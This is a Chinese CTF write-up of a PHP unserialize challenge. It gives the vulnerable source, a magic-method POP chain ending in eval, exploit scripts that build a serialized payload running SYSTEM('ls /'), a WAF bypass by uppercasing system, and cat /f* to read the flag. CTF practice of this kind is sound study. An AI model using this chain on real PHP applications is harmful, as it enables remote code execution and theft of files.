原题如下
<?php
include "waf.php";
class NISA{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw{
public $huang;
public $su;
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
public function __toString(){
$bb = $this->su;
return $bb();
}
}
class four{
public $a="TXW4EVER";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
if ($this->fun = "sixsixsix"){
strtolower($this->a);
}
}
}
if(isset($_GET['ser'])){
@unserialize($_GET['ser']);
}else{
highlight_file(__FILE__);
}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
先给出魔术方法
__destruct() // 对象销毁时自动执行
__wakeup() // 反序列化中自动执行
__toString() // 将对象转换为字符串是自动触发
__invoke() // 将对象作为函数调用时触发
__get($name) // 访问对象中不存在的属性时触发,并将名字作为参数传入
__set($name, $value)// 对对象中不存在的属性赋值时触发,并将名字和值作为参数传入
__call($name, $args)// 调用对象中不存在的方法时触发,并将名字和参数数组作为参数传入
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
有Hint先看一下Hint
exp
<?php
include "waf.php";
class NISA
{
public $fun = "show_me_flag";
public $txw4ever;
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
function __call($from, $val)
{
$this->fun = $val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei
{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw
{
public $huang;
public $su;
public function __call($fun1, $arg)
{
$this->huang->fun = $arg[0];
}
public function __toString()
{
$bb = $this->su;
return $bb();
}
}
class four
{
public $a = "TXW4EVER";
private $fun = 'abc';
public function __set($name, $value)
{
$this->$name = $value;
if ($this->fun = "sixsixsix") {
strtolower($this->a);
}
}
}
$a=new NISA();
echo urlencode(serialize($a));
//if (isset($_GET['ser'])) {
// @unserialize($_GET['ser']);
//} else {
// highlight_file(__FILE__);
//}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
flag在根目录下
观察代码中的危险函数eval,所以这道题是从eval倒推上去
NISA::__invoke()=>Ilovetxw::__toString()=>four::__set()=>NISA::__call()=>TianXiWei::__wakeup()
exp
<?php
//include "waf.php";
error_reporting(0);
class NISA
{
public $fun;
public $txw4ever;
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
function __call($from, $val)
{
$this->fun = $val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei
{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw
{
public $huang;
public $su;
public function __call($fun1, $arg)
{
$this->huang->fun = $arg[0];
}
public function __toString()
{
$bb = $this->su;
return $bb();
}
}
class four
{
public $a = "TXW4EVER";
private $fun = 'abc';
public function __set($name, $value)
{
$this->$name = $value;
if ($this->fun = "sixsixsix") {
strtolower($this->a);
}
}
}
$a=new TianXiWei();
$a->ext=new Ilovetxw();
$a->ext->huang=new four();
$a->ext->huang->a=new Ilovetxw();
$a->ext->huang->a->su=new NISA();
$a->ext->huang->a->su->txw4ever="SYSTEM('ls /');";
$a->ext->huang->a->su->fun;
echo urlencode(serialize($a));
//if (isset($_GET['ser'])) {
// @unserialize($_GET['ser']);
//} else {
// highlight_file(__FILE__);
//}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
这里被waf.php里的函数拦截了,fuzz一波
将system改成大写
cat /f*